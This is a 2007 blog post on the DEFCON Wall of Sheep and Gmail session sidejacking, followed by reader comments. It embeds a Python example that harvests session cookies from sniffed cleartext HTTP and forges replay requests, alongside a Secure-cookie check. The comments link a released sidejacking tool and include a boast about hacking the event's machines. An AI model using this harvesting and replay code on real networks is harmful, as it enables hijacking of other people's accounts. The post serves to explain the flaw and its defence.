
DEFCON 2007 - Wall of Sheep (shame)

By George Ou | August 6, 2007, 11:38pm PDT

It's time to count sheep again, and I don't mean the ones in your sleep. I'm talking about the ones on the Wi-Fi hotspot who are using insecure protocols and getting their online accounts compromised. What you're looking at below is the DEFCON 15 Wall of Sheep.

What do I mean by compromised? Usually it means one of two things: usernames and passwords are being transmitted in the clear for anyone on the network to read, or the account can be hijacked because the attacker copies the session cookie the site hands out after login and replays it, getting into the account whenever they want without ever knowing the password. In the screenshot, a very large number of Gmail accounts that were not using HTTPS for the whole session (https://mail.google.com) were hijacked. Logging in over HTTPS did not save them: Gmail by default kicks you back to plain HTTP after the login page, so the session cookie is sent in the clear with every subsequent request, and that is all a sidejacker needs.
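As an added example (not code from the original post, nor from Hamster or Ferret), here is a small Python model of the failure described above: the HTTPS login itself is never seen by the sniffer, but the session cookie it set rides along in cleartext on the HTTP requests that follow, and whoever copies it owns the session. The captured traffic, host names and cookie values below are constructed placeholders.

```python
"""Sidejacking in miniature: harvest a session cookie from cleartext HTTP
and replay it, then show the one cookie attribute that would have stopped it.

Added example; not code from the original post or from Hamster/Ferret.
All traffic below is constructed; hosts and cookie values are placeholders.
"""

# Constructed capture: what a passive sniffer on the hotspot sees after a
# client logged in over HTTPS (invisible to the sniffer) and was then sent
# back to plain HTTP.  The SID value is a made-up placeholder.
CAPTURED_PLAINTEXT_REQUESTS = [
    b"GET /mail/?ui=2 HTTP/1.1\r\n"
    b"Host: mail.example.com\r\n"
    b"Cookie: SID=deadbeef1234; PREF=lang%3Den\r\n"
    b"\r\n",
    # A request with no cookie at all: nothing to steal here.
    b"GET /news HTTP/1.1\r\nHost: www.example.net\r\n\r\n",
]


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie_header(value: str) -> dict:
    """'SID=abc; PREF=x' -> {'SID': 'abc', 'PREF': 'x'} (request Cookie syntax)."""
    cookies = {}
    for pair in value.split(";"):
        name, sep, val = pair.strip().partition("=")
        if sep and name:
            cookies[name] = val
    return cookies


def harvest_sessions(requests) -> dict:
    """What Hamster-style tooling does with a sniffer feed: collect every
    cookie sent in the clear, keyed by host.  Returns {host: {name: value}}."""
    harvested = {}
    for raw in requests:
        _method, _path, headers = parse_request(raw)
        if "cookie" not in headers:
            continue
        host = headers.get("host", "")
        harvested.setdefault(host, {}).update(
            parse_cookie_header(headers["cookie"]))
    return harvested


def forge_request(host: str, path: str, cookies: dict) -> bytes:
    """Build the replay request.  The server sees exactly what the victim's
    browser would have sent; no password is needed."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Cookie: {cookie_header}\r\n"
            f"\r\n").encode("latin-1")


def cookie_sent_over_http(set_cookie_header: str) -> bool:
    """Model the browser rule that decides whether sidejacking is possible:
    a cookie set during the HTTPS login is attached to later http:// requests
    to the same host unless it carries the Secure attribute (RFC 6265 s5.4).
    HttpOnly does not help here; it only blocks script access."""
    attributes = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "secure" not in attributes


if __name__ == "__main__":
    loot = harvest_sessions(CAPTURED_PLAINTEXT_REQUESTS)
    for host, cookies in loot.items():
        print(f"[sheep] {host}: {cookies}")
        print(forge_request(host, "/mail/", cookies).decode("latin-1"))
    for hdr in ("SID=deadbeef1234; Path=/; HttpOnly",
                "SID=deadbeef1234; Path=/; Secure; HttpOnly"):
        print(f"{hdr!r} leaks over HTTP: {cookie_sent_over_http(hdr)}")
```

The point of the last function is the practitioner's check: a site that authenticates over HTTPS but serves the rest of the session over HTTP is only safe if the session cookie carries the Secure attribute, because the browser will otherwise attach it to the very first plain-HTTP request. Forcing the whole session onto HTTPS removes the problem entirely, which is what the https://mail.google.com advice above amounts to.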

The Wall of Sheep team hunts down the sheep in their command bunker

Robert Graham and David Maynor side-jacking sheep with Hamster

Learn how to protect your online privacy here.

Disclosure

George Ou

http://blogs.zdnet.com/Ou/?page_id=557

Biography

George Ou

George Ou, a former ZDNet blogger, is an IT consultant specializing in Servers, Microsoft, Cisco, Switches, Routers, Firewalls, IDS, VPN, Wireless LAN, Security, and IT infrastructure and architecture.

Talkback (10 comments)

  • Not good
    This sense of smug superiority can't end well. It's a useful service, but let's not forget they're compromising the easiest targets first and foremost. Let's keep our perspective, please.

    ...and yet another homage to Maynor? Wow. Just wow. I hear there were actually other security researchers at the event. Don't be too shy to introduce yourself.
    GW Mahoney
    7th Aug 2007
  • They were just doing their job of sploitin'
    At least, I think that is what you are to do at DEFCON.
    nucrash
    7th Aug 2007
  • GMail, and millions will benefit
    Whether they are smug or not, do you think Google hasn't already got a team working at making taking over Gmail accounts harder? I would not be surprised if HTTPS became the default soon and users will have no HTTP access soon.

    TripleII
    7th Aug 2007
  • Your obsession has to end
    Your obsession with Maynor bashing has to end. Besides, this wasn't a Maynor project. Hamster was a Robert Graham project and it's hardly the entire story here with just one little photo at the bottom of the page.
    georgeou
    7th Aug 2007
  • We're still waiting
    You had promised us emails and exposes about how poor Maynor had been slimed by others.
    Robert Crocker
    8th Aug 2007
  • georgeou
    8th Aug 2007
  • You may not agree
    And I don't agree either, but George did present his rationale ( http://blogs.zdnet.com/Ou/?p=451 ) and I give him credit for that.

    I didn't think Fox was out of line to publicize the fact that SecureWorks would not confirm the original claims. If someone drops a bomb that any MacBook can be remotely hijacked in 60 seconds, then they claim that their demonstration did not intend to make that claim - in other words, "we didn't say that" - *that* is a retraction. The fact is Maynor or SecureWorks should have confirmed or formally retracted their own assault, but they chose not to.

    Some people went too far, saying Maynor admitted to lying, which he clearly did not do. In the end, since it turned out to be a fraud, they were proved morally right, but it was still irresponsible reporting.

    I say fraud, because the best they could have had was something that was very hard to reproduce, which is not what was presented to Krebs. In fact, that private demo almost had to be rigged, since it worked the first time. However, since his incredible statements, "I didn't feel the need to do the entire hijack", and "This is now a dead subject for me", we should assume the worst of the remaining unanswered questions, which is to say that after months of effort he could not reproduce it on a standard MacBook.

    George may not share my opinion that David is a disgraced researcher, but when I see him or his company being used as a primary source, it's always a jolt.
    GW Mahoney
    8th Aug 2007
  • Again, this post has nothing to do with Maynor
    This is a Robert Graham project which he proved on stage and to me when he hijacked some Gmail accounts. The code is being released within a week.
    georgeou
    8th Aug 2007
  • Already posted (link)
    I think this is it:

    http://www.erratasec.com/sidejacking.zip

    I wasn't doubting that Robert had done this. I was saying that it's already been done and he was just scripting it. Does this really count as security research?

    I encourage other programmers to comment. My perception is that anyone who's written a bot could do this in one sitting.
    GW Mahoney
    9th Aug 2007
  • n3tw0rks4t4n
    I have a hunch that this year, the Wall of Sheep crew are going to end up being the sheep. They will not be able to perform their network plain-text pass scouring duties, once we get ahold of their boxen. They won't know when or wherefrom it hit, nor will their weak distros be able to match our challenge =) here's to hell-acious hacking! n3tw0rks4t4n
    b5981202
    28th Jun
